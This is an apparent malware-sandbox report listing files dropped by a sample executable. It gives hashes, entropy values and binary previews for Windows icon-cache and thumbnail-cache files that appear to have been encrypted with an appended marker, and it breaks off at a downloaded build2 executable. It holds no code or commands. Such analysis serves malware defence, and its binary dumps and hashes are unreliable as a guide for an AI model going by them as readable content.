..uM.....G.n...t.+:.._..^.l....nI...A....N;...&.T.])U.....:0"7...S...`N..:-....v.d#.j......o..})X.......y...EI....liC..AR.....S...#.1N.}..Uae_Z..9Q...fh...jt....C..&.o.....=.?v..&.A...T.....!..UA[...'N....{..(.'x..".......*(..._. K=....K.FE...o{..o...T-Y.s'....S]./...82.S[t......

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	16718
Entropy (8bit):	7.9893531631578085
Encrypted:	false
SSDEEP:	384:bLlH+2EscSumeo9cxblkMAGbDEFHvVzc+rh/XQfMnIkqgnnJjn4znl:/lzumcxJ0YSF9QfsIkxG
MD5:	0CC85B2B88348394355FD0CC2E28F2E3
SHA1:	787019FA454CE16D96452262D3A7D59A71937D7C
SHA-256:	69CFB2E97DD4A40702D0B50B710854A60849ED5F505FEB06E2179EDAB2BADF9B
SHA-512:	5918A007261082BC715AF64E52855DEF8B7A84F4EF2DCBA4FA0148DFF75D9B47139319E4FEF27670B8032FB7FC666DFC00E750FE339238FB3E60830887B0EF72
Malicious:	false
Reputation:	unknown
Preview:	. ...H..b.B..."}Q.....R...$....u. 49..^..d.o...9gx!3T12.3.Z. H'.b.d.....Z...'.Yd..r..s..........J.F.D.Pr..S.P..H.a.^......l.o.X...0V;3............d).....Qr..Uw../...B\|(..-h..B..(8..,.S.Hr}.....P@..R+.6..&........<C.\..]+..FM.&4....n....Z&.zO...T....U......H/.b.\....k...$.\...pM.cN..........~....=G,O.Q/z.h.....a..B..Jz...R.9 Y.!......`F.1.S._2..N...K\|.4. 0....\(.^.5 >..xm.u2{.I4~..94.VY%.Ln7r...1.G$.!..:NW\|..9-.)..@..}K.;.......G.m..z.......}RN..c.Tw......8.q.........\|.kb..S.:"\|!.+../97.c.t..80..$...Q...0r.&.0!W.."3.......8Y....wjQN.o...n.FYu..>..8....y,,f:.a....h..l@! K.v.....?..una.~Z:.C.f..j....r.)..^.v..1w<..0../#DY..U>E....k..........H)5%H.\_.E..3..i,...dQ..1.s....a.;.'.hL7._~P.2.T ..y.h.x.r.JK(....]..OA..K.&.Y..Jj..1ks..G.z..e.3...G.t!...+.....Z...B..7%..r.w..J..f.g.......A:c.E./....7 T..{^.z.......n.X>...]..ke@. .s.1.mY):....P.ec....W.\/.}..1..H...Z......nU.Hu=..!...oJ...n.~qE.C...\\|..b02.o./.....h.a.8...C0+;..(..M.0._..X..f.r..:3..&T.C..

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.277441703396149
Encrypted:	false
SSDEEP:	6:GAOJLOpwlxNGykyRGx2AvkzeO6+eL2CNADxhA9YxCVe3ysly4GxntHcii96Z:GAOIU2Z7wKkzBeLXAjRgc3loDtcii9a
MD5:	75091598C9251477B76B6D9718860AA1
SHA1:	847055DBC3014D3D1BA280CF4D0BCB13AD16E4F9
SHA-256:	E988494D4EA12A061866E7F0E3657259AAAF2D95B673EDF9F24E6B54050C9C01
SHA-512:	A3BF735B8066F79A491ED7C7A1E43300EABD6ACF76933F04C4196CFCE089128630A8CBD28BF0C799B60D512A3F2FF20AD6C70B8D1B71E0B90107F497E4CB5762
Malicious:	false
Reputation:	unknown
Preview:	CMMM ~o..d....]..B.5...\....n....K.-...*gd.'.Gr...-{...l.....L....w..Z.#...2.`...I.......#.;.L..H...2......Y.HZ..1..f2.o..7...$.71..#9.mIs..>o...y......k[.}...'.B..%&........\..g.f..#.%U...9?...f....a\|.u...B[..t1.8..Rep\|9..,K%..l..e........R"...A...).L?.-.+9.....#K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.301617742591828
Encrypted:	false
SSDEEP:	6:iCiqoiSqI93dMEnr3QcsEXxTtzxwgbferD098ZFrOjmGxntHcii96Z:5oiC93dMEUrQTcgLM09EFO1tcii9a
MD5:	829337618D7FA8CFD45521B8985EAC08
SHA1:	C64D0B829AA2F4086B1033433849E0DA6E6D05F5
SHA-256:	A6CA5815CF2C33EB6CB0A9678FCDC63B49B3494ACD0F764FE72103A837617FDA
SHA-512:	AD33107D3CC078E2301FF277AC335E859B56FEFC34914A60B416F89614CF400DD19F53F2610BD5499B205B49814B4D58BFB48CA4D665E59D886D5AD6B12403A5
Malicious:	false
Reputation:	unknown
Preview:	CMMM ..=.'$..aw6........$..a...(;GP...A......b3...I..@...S."2...TQ...\|.Y... ..N#y`..../.....Z...PS}...S.x._.........,....SF.H..G.\...Q.B.W.%t....}...t.$_....7....N.H..Q.K.N.agO.b......A....a.......T...?.......f.:...0...;..)2....k.s..ZF.k2:...fu.CB.e...D.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.276216670162218
Encrypted:	false
SSDEEP:	6:f0Du2765WQ/W/26NfkM9ibQRMWAI0GhiG+OGxntHcii96Z:fLjvc9mdqALQiGGtcii9a
MD5:	EE238C06936432B4C03E038150A77159
SHA1:	B2D60C41F893CC0EA90D0B16BB04781432C4F0F9
SHA-256:	FF59C2C1EF0998B7D9AFE4B13B0ABB00AC577536A39E8D2553D6D0CF48FBFF21
SHA-512:	0E009786E8D39378825C99DA9F185C6F7EA2A13516FC7ED333F0709D06AA56AD4C83F0D4C9334462DF8A65F1FE9C6BB681BAFAE07D4F9EE682C0CD8DD7DAA21B
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...r .p.Om..EQ...."1.>.jrr...RR.1m.v9'. ,.c.!..&..`.s..'D.mtx# =..l.B..z.YDa..(us..Uz......q3.jn.\......n..^..p..]U.Gz..%.%.....E].q.y~w)z.J$..)\|4....y;z..a.0j..cI.C.P(...._.yll.]b/...I.i.....7R.......m.~..4....&y..h............OoYD..<..z.Ln....4yj.}._..[.-..*j...K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.279622482868569
Encrypted:	false
SSDEEP:	6:NnGIC2d+BmaHPxzAztc0WTnCQs1UqSnb20GxntHcii96Z:1GIqBmAxzAzSZrCQsy2Htcii9a
MD5:	0EE894642DC09C40457E398237D1B94D
SHA1:	D2B9C73794D7BB0BDB4E4B59E2399C4372A2A390
SHA-256:	2B2A1F8D2475133682A61C4C833F3DA582281CD1380DBFE6137E01E7A1F96729
SHA-512:	F3834B3048B14A2429F464FBC5E0F7467E9FE339C9BC479F2658C8F7FF4947E6F081339D4687A2935C2F0D027991CF3E39B2F5F13F90F837EB5E45D3BDDA9403
Malicious:	false
Reputation:	unknown
Preview:	CMMM m...15F@..a....B.3.E...P-...<.....}b.$.h.. 6.M.g...A......4...o,...\.C%."....nD....!)]..c..<....~.....%.y".....C....Ka.Yq..JJe...8...Pxq.6.....r.N.........8.6...$..s.Vm./..._J.a.Q.k.9...[.<....C..kj...n.......d...[q..#.G...LcZ.[.r"..T.}...u..g:{g(.(!YU...(.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.291761509636551
Encrypted:	false
SSDEEP:	6:tGClXdfISxf9c4w4KWWHTjOWaQTK6zhBVevSJmA3KvDzDenEShTAiGxntHcii96Z:tGCYgfU4UHLnb8gKvLShctcii9a
MD5:	CEF6EDAF9EFF36F0D94FC03345176D0D
SHA1:	CCD7382BFE779E9F6FD29AAE3A500ADC8CED40CD
SHA-256:	DD6E1A7B70683A0BFBF691AF06D8F2D0E61F1DD93AA582661635A8233729F092
SHA-512:	B2613E2459AFE0BE34CC19AD0BC699ABD18AD005D8834738948CB9FE4C349CA7A88DC14CDE7BE59C5752F43C96CE4EEB3334203CAD3F5633BF1021F8BD91CCA8
Malicious:	false
Reputation:	unknown
Preview:	CMMM 6..@.&.<.~..1..D.U,.mmj..-;..C...2.....V.iM.......Bu}Z...t.f./.)a........!0..v.`..j?..mz.DDTl...0TI.6....:.V.,.8.%Z56.rq..Q.-..0..#!V...b..q..]..C.v.;...df.oB.C..L.b.>e......."q.j..$..w.>Y].\|...I.w......yr..2I......e..D..o...R.E..3.._.!.........m...j_J.]l..(Q-...KK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	GeoSwath RDF
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.267637862601939
Encrypted:	false
SSDEEP:	6:/dBu1eEWBgmmgH2JaxCFR/6UB4kOkNVRqJ1AiGxntHcii96Z:/do+BKgH2Jl/FBSkNVRA1Adtcii9a
MD5:	49EAFDCD533829F985F14E0E0D21E2A1
SHA1:	2AF2B6CD800C5258C4DD9A522518768A5B3038DB
SHA-256:	00A0C72579D47FE2E7FF22D61E4A8EE651532282BFFC71FFEDEC2968A93C0984
SHA-512:	F0D67B531156855397512A4BCB2C818CA7E5ACDFB6D6B4F63583F6CDF36495F533802886F410FFE74F828BDF7F2B5F80FF1BA08CC34C3D1D7BC4805977AC8CE7
Malicious:	false
Reputation:	unknown
Preview:	CMMM .W....N.?h+.#;4.r..P...qYyZOQ......<u.i\......./2..G...3o=....I.2.}...C.?.O.3..._gq....X.......Y-.....3..fcxY.`..Gj6hx..^.P.q9.Q.......f.....L....ttJ.=..K..j...R......4..j...B..~3fo..@...-U$07(.o......#Fr..o....S.[>...;.dp.z.3..7..v.m.,.c...7..}=N..im!.4n@j.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.2704934323542085
Encrypted:	false
SSDEEP:	6:zc3KOMJR/K/yZoys8FpmS827DUKl86dBauJ5+hQRiHVpOGxntHcii96Z:zcrMJR/dyysimNfc8eBV+hQRgtcii9a
MD5:	10142A9DDE11FC6FB7A0B504C1F545B6
SHA1:	15E5E9A5357299314B704BAEA63504D73607D77C
SHA-256:	9E24146601627C4E9B3E998F51838A55BEBE9B01F86EBFF8D35E1BC03DABE5A7
SHA-512:	F4E73C1634E3A9E5F0F512A37947FEF0EF74A9254A75B41F2708229CBAF0D74350FD455593A4C17C38313ADC0D626E8B39F9609222F11647BB4C024F013DC28E
Malicious:	false
Reputation:	unknown
Preview:	CMMM T...AxgR...p...L.8..m.[. o...3.A,t;...8bx.N9.]`.F.F=.wl$"R.>gE.P...J.u.x.......l.9..epA.8.7>S..~..U...?f.....\.<0.+...>;4R...*...^..:.S..j6.EJ....X...D"..O7...b...'~...T..[c..Q....FL......A...t..~....Nx}...CV.+D.1w`.W6.K......... Y..........NJ.j../...(...2.s...K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.271043675308291
Encrypted:	false
SSDEEP:	6:sEO5UAWted5k0lYs5ET+ENCB2UK5Vriu61dJZSv7qr/6AU8iGxntHcii96Z:h8ZWt50+MET+gCARVWNJEYtcii9a
MD5:	BD460F19120619DA6CACA3E30B1A1DBC
SHA1:	5A87E3CD6531057A84DDAA9C8130DFEB2916E884
SHA-256:	8A7A339CB90C17C22A3ADF56847A14314D9A2C3859A6187194829D71F55C3727
SHA-512:	5D3D8EC8AB304268AC84DA1B30695E7B60D5E479C972302B4FBF81B46615646243B4778D7697F8544C6E5DB2F5E068BF1629A02CE35F0DC00514A6FB874B2A19
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...H.Y..z.<...,WX..[....`.Gw.....).HB.^@.[.... ..!.m..8z........wL.._..m.aE5GVM........ '.$.h.!.o....K.Zt.X.iG.&.#..)N...B.d..0.A..*8..[...a..2.A>C..>."S.U..t.E.Y.%M. o.J.es.N1....7..7R.g5A.pg_..Wk..j.p..W..=D:...<...P..\|.....Gf1jP^...J\.M.(%..)...LN..z.....uN^."..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.33103692967462
Encrypted:	false
SSDEEP:	6:wdboLHGlD3nCvPicFgivml8yo5xla2Z/rKX1wD3lldoDf1/9cXzGxntHcii96Z:wdboL43CvPpFHvmuyo5Ta2Z/rKelQSc1
MD5:	4350E8896EE6686EE8F00120A58AC1DA
SHA1:	BC233A916B499FC09CCB04EE151C9AC57A6F3B0A
SHA-256:	4AA1A14BB13C491A9268DA22B3CD298F0F6EB5D388F6F35C190EAEA8DC3F8325
SHA-512:	B2275A2D5F0C58E5E7D242A7ADB00105FF417622635718ED3755FF7D7282048929DD80FAA34C9A79DC0F1CBB783D214ABC1B214135551002AF40A8BCF5436B1E
Malicious:	false
Reputation:	unknown
Preview:	CMMM no.Iu+.g.......R..<0...l.`yn..I?].r~..l.....6........Oc...A._J.BS..@+p.d+...O>..tXA..<....p?...@..@,I....H.../U.s..Vr.z.f......%.Y......^.T.-J...i..8=A.Ln..A...<...t}N..:q<.2[1.'*.M.7=.6..x..fJ....Z..y..S.R.<3S._...k..z.....U.9`}.ya..v.Qc.../...S.:.....~.l.....'CK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.305115012351504
Encrypted:	false
SSDEEP:	6:woMIX2V/qPxJG67giDE0wQ4d03C3TiPjaDGj/zHj8LuX/+e+vBCfCVc3/yzaeq2j:xX2UZJGIAb5cC3TWRrzD8eT0CxOaicY1
MD5:	EBFE73C3750BF6586AA1CF776FE06C9B
SHA1:	053DDCCDF6E0F53A8EB711340D7C6036AB800F35
SHA-256:	1E14DDC5B109357695119CDF5DBBD15B58C9A88953C4252D3B0423D420D4AA48
SHA-512:	595B5DF3FB46A9BACF99A67967AC041DD0B9A61FD4BA297553E70CCE947D45517BF30B059EFD901D7C6B8EB8B28F619C4791160B3D78A8B7B1B881E08BEAF5E2
Malicious:	false
Reputation:	unknown
Preview:	CMMM 4..1..H...s.$..k6.7.indlz.........]..=....Y.N.....'....4..2G...gq;.E....g...!:.....+.......Y.a..I...`U?.M...h]....H.X?_S.B.!7..vjA..>\|c..b.S...S......S.I.eX.......#.#.(...i..b&.Dfa...ae...W...C.z.Q.....%.N..'h.P1.Q.I.........p.c..vJ..3v....^.g.v.>..X-.}....K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.161773567163932
Encrypted:	false
SSDEEP:	6:MV2b9E7yzXQRSORc7vTIVIyABYO6H+RJu+srQzTL7odyXicHGxntHcii96Z:ox7yTQRI7hyrOnJu+scfLojRtcii9a
MD5:	CCFAAF594CCB26DC6F7EEC4E12512BBF
SHA1:	FD32216CB7C42E793CD9D71262BFA9BD7B9F4538
SHA-256:	900249490F4E72F38F3F37D5A5E9F774CA2B1FB22D98B4885A904FCCA8CBC1E3
SHA-512:	9699A79B264C2688D23F151D45CEA89063F4BFB61D960A0ED14F43A2526D62D78CC94384C65F0696579690F2E7E27B95AF83DA882BE77EE27D5C7091176E1435
Malicious:	false
Reputation:	unknown
Preview:	CMMM .\|k...#.~..z.4o#.......c.,.$...O+j.36[.....?zt.AX.rs.[7&..sW.. g.]o.Sg.W\|\.g)[...;g}....H...O..k..bMJ..-CO<...#].,y..W.....+.^.z.Z...0..0PP$wn.{..0.YW.[..P1..G.R3..].^/.Vwdz.].....M..z.Of..Z.[......@..P.r2d+..K..@...G`......S6....!#..$k..\|.Ed....B.....G..P.[..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.243020798377618
Encrypted:	false
SSDEEP:	6:sOwhp8KVBSIt/Ox3o0hdYhPjixD0u7hHjgB0w23AliGxntHcii96Z:ghp8Oox3ogYhOmj0w236dtcii9a
MD5:	72722C2FC3BD841C0ED68BF4EB4EBC19
SHA1:	BF6EDBEED780A746BC410E44FBF2FE3DCE3DBB7E
SHA-256:	6214F15603C993CB6AD02241AC8337F33320BBF4922012F675A7871ACE67DCF1
SHA-512:	A3E54C54362DAA6B744DE9BA817FC3B613CF5288E928C52641A9BF8D6362C3F161552F6C5FB8BABC2DE27F00092D04979CF197DF34E1EF00C74656C16A9F2359
Malicious:	false
Reputation:	unknown
Preview:	CMMM (.n..!L....l.....T.5l.y`..,#........&..G.k.62.C(YB.U.pH..X..jL5a.eg..<bc.......A.l.6..q.i......v$.PZ-..r.G\.f./.......r..........y[.Z...^p.!9..W.uY.\V._Ty:\|....;#5..~\."c#..:8Z.p....U..?.?.bdT......@...i..\|i.".K...AM.c.p:'kF..q..R.GL[..0G.b..m...y.H...\|V...}..^...y.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.316943685100272
Encrypted:	false
SSDEEP:	6:sovlbj5skg2OqSDZXDWnz7+RyAAD8n9ZmjXU4c8OhynUyTOFE68AiGxntHcii96Z:Dj5skupZXKuR9Y8n9SU4why8i68Adtcq
MD5:	EB88C3AA5DFDC1B9B8B294FD2B412AE7
SHA1:	34639333611AEBFDC15F9B63E715288B514915F1
SHA-256:	18D7AFFE2130C51F52AE8795ECC4FB62A41ECEC6C454D17F9A24F13192729AA9
SHA-512:	1F889C59507C36C052B421CC7470F2F01B1EC45B82E1411057F62591187082EB4834D061A65065067C985769B69BC4F9577E5D4AE2CA718AFD29152250531BB9
Malicious:	false
Reputation:	unknown
Preview:	CMMM gz(.......n.Eo!...p..:......}.....S..b.d.........,.l....AEe......6.S.swrf..oc..[yF.....!J]...3o2.y......0......H.r...2........ ....&...l......t......u.......b....2.]..A^Br.s.3*..x/..<w,....-.A.x.NR2%..8/.C...q.....X.V.R\.I..5-..q...5..l..+....".mQ..`..Q.}...JM....K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.339075590452771
Encrypted:	false
SSDEEP:	6:ujxW6Q24ze9iGJ7sZmqv/r6SGmAmvohtI+paziGxntHcii96Z:ujw6YAiGJBqmS3ovI+patcii9a
MD5:	A30186DB9364D1F38E7F189AC9D9AAE2
SHA1:	B2467C08EF20AA767DDD79A9FE82FE61B63875DB
SHA-256:	1E844D72B6F3D7D7413CA96D8A6A1C6870DE77A8787CB54FF62E2CE3B91ABD25
SHA-512:	A82124EC99444E6976AA70246DF7800283465036BE0390FB272D0C9CAC891A9B69026E900A9125E0B088F88F441FEB3D75BF630796CD1B75E3A4A425971236B7
Malicious:	false
Reputation:	unknown
Preview:	CMMM ..W...r.0'R7 .....V`..!........[...T.W..F.a....b.......Ac...4..Q.v.<..57..(.....%.,.nEk..?.}_.jV...,..T.@of^..j!.A,.M....1.h..6.<.]......4...................m'..b.M..`4HS$d<.((..ZB.y.....v?..........p$!.!.N......q.........o...QC./Y~...y:.%....-..nq7.R..k3._..'K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_custom_stream.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.223017280336472
Encrypted:	false
SSDEEP:	6:8Cutx4VBudlhy9dlMAZ8fSxZEuzJTtFY+NIGT/BKmqEHdOGxntHcii96Z:8Fts7H+W5zJjY+NpT/T3Htcii9a
MD5:	BB4394C8A9F261990BD90095FD981088
SHA1:	D07E1B2A746CF3E0B3AEEA375AC9C4738097354C
SHA-256:	9702F2801C6FD49662FC986118C526692BD367A6D52C9A7626F9DC857EBBF830
SHA-512:	286D50BDBE7763841F4C8E829A47AA361DAD529C5AB0CB9C25CD3E8B4412F91573F53F18E8614756DB3150D96BC169CB951FA2E4FD9433A06CAF2DF6F37B8950
Malicious:	false
Reputation:	unknown
Preview:	CMMM ..J....ut83.yG....g..t....\|...g....\|_R...D.M..p..[.......N.a....c...z.K..}..Q.u(........@...XZ..%=..8NX..Kn.[....q?..3......#.Go.s.....y^..J."w...O\.xq4u.l.J.\.7.....N.p;..AaM...,6..RoY)....R5..ik..l4a5...y;....B.=.tF.q....&].......g....3Da..2Y.-"A..".....G...@\|.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_exif.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.2158799715042266
Encrypted:	false
SSDEEP:	6:DVb8Kx5zmTpvXmjRPpykVzv6pjsuhSInk4BB3BZDURWnjfHH/VYf/OGxntHcii9a:9pxlePmFPge6hsABZIRyjFy/Rtcii9a
MD5:	7F0E3FF1C6EA95C6BE3F4CD72EE4954F
SHA1:	C20F06853D333F7706EADC649BB0BCA7A92AB4E6
SHA-256:	BEFBF877E8FAB55C52BB62CF5202ADB447A0F5E8D506336418197EF9926CF1F6
SHA-512:	76312A89785F9D7C5BB60E91891C60BB27E4DE55D7F538100A235B2281D93B8903044737385743AEC8F67D68257248A624C1E2CC4A3B4439819368EC71A93FB5
Malicious:	false
Reputation:	unknown
Preview:	CMMM .?......C.y.ff.Y.v8.v..!..P........Pt....(..<^.y.MBKv(t...Kc.V..B....>'Q..jr.56Fr:.........Y..F?.B..y..}....?z...bY.. F.....Z@=M...v.gm.`..(W.N.t...#..6.._E.......g.^a1B..r...4._....I..Z...Am...........c..N.u......\|.M......W~.buE.Q.A.U...:.o..`..p...Trx.z_...Yz..Eu..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.2502556879468445
Encrypted:	false
SSDEEP:	6:X2nlaxV3mL2eEpnHm2zPfiHhINxnJ4R4myWSPMVnP4fDxkZjr5nuDGxntHcii96Z:AlvEpnGo+QxC2xWSEVns8r5Rtcii9a
MD5:	63DE5FAD4B77A4A3D11E6E283AA1AD0D
SHA1:	453CE739179B7C63D4DA40F264337645329DEB07
SHA-256:	B41F453CC07E4BF95B8B087D343B092BDF6AFBACF14C47034AD4F44A1D00B02F
SHA-512:	6CFF8B0BCE7F9C10CCBE1B95DC734AD55141F2BFAB28E8E04CD5956F05925C70DB288EB056CC5F0E2A8951CB615767179C7E0DE8C60AC14BB89FF79B84D5D1AB
Malicious:	false
Reputation:	unknown
Preview:	CMMM =..M..S@.~@@..\|$yG.L]1.#...u.c_.=6. X+..{.g...6_.U....o..3%YW.LP.h/U...x........X3X.2....L..OCS$.n\|.<-..<....T`-.z.......R.{W........\|....].H:/.I1.+.8h..U...!R..D...L.!........M@&..i....$.......`9...~(.......:.'..j..Qep.(....g.....~.:.dz=tx..=.j\...k~B\|Y..A.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.331497256591886
Encrypted:	false
SSDEEP:	6:QDGw2K5H9jc76GrXCHziiJbWesB0zrnHUWX2UE6l0vDMvRL94GxntHcii96Z:QDGE55srXhM205fl0vDMvZptcii9a
MD5:	6940F11FD96771DEC9FF1AC57E6703D5
SHA1:	4EF64E175B8EAED160F7A4CEDF98FF5AB6D7BCB5
SHA-256:	122105BE90DA8732696CA8E1987A55E66C5E400566F54814ACF93AD3AC466390
SHA-512:	8A285F40E32D6CA7F40ECEA5DCA953EBB47108795E99579BA108C3D3968961FCBC53FC4C1677A8D19AA495AD4396BDDCE3923062D444335CF7D1126288D02279
Malicious:	false
Reputation:	unknown
Preview:	CMMM ....8.V...78ya#7A..@ M%.4D."~F...e3..n(r^....k.^.N.%c...p^......y.....F.Y..D]..r..N...d.T.4.s.i.a.O...a-..ab.H...b..&...9.q.,.?.......!..\.[&.J...$....e.....Wf.....L..Z.....VCO.0.V:..z....8+..#p...'.A.P...5.!........^.......H..<.$'OX`MwQ....i^d-.@t....$_..5gK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide_alternate.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.295687706121399
Encrypted:	false
SSDEEP:	6:TPi5CIqmF3SdVTx35f41xVQNUW77cjU+M3/RYGBRkcFqY7jWoSFDDGxntHcii96Z:T6aE3ktVoo7YA+MpY0ScFZ2gtcii9a
MD5:	2C106AF5BCE28CEE05D4309A36CAF64E
SHA1:	79DB2D4E4778BE69E47506234817D514905C38A0
SHA-256:	03508A00BEF1CC40C9641F8DDA20AFEE1DD3ADB846FD3DEFB75063468C177C5E
SHA-512:	94970B1E11A2C9A7EC9B7D422B924986DE085289CE916C4EB5625D4504A4C2D1359E347D6D28FD007F82982B10F9F076344E07C364B9376F3C8F703EE1725C5D
Malicious:	false
Reputation:	unknown
Preview:	CMMM ..7.F.!.J.$.'.w/.Cr^a_.Yg...#......QS.~\...`.4.ah.'D..".P2...M.X.?.........AE...]m...h.<.rp.Qx.9e....;.....W.+..:.h.9h...B..)#s....$..y"!...o.OQ^......Vn"...X..9>......Frf..U.*~....r.H>....[T/..%p. ..g.U...m.CD.....J....;o.98yp._S.%.]M:..~?.l}..Fa......0..d..UHK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build2[1].exe

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	264192
Entropy (8bit):	7.604857605538325
Encrypted:	false
SSDEEP:	6144:YdAhH6pftFbsb8XODU4aLTwzLs0+mKnBtt:VUpftVcwIU4aLTwz5tItt
MD5:	B9212DED69FAE1FA1FB5D6DB46A9FB76
SHA1:	58FACE4245646B1CD379EE49F03A701EAB1642BE
